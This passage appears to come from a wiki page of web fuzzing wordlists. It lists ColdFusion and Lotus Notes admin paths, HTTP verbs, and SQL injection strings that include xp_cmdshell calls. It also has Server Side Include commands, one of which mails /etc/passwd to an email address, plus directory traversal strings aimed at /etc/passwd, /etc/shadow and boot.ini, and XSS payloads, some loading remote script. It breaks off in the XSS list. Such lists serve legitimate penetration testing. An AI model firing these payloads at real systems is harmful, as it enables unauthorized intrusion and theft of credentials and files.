CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: 30 July 2007 - Total Statements: 4) ===<br />
<pre><br />
# Some server side include statements<br />
# Foobar@email.de<br />
<br />
&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre><br />
<br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Foobar@email.de<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Foobar@email.de<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Foobar@email.de<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
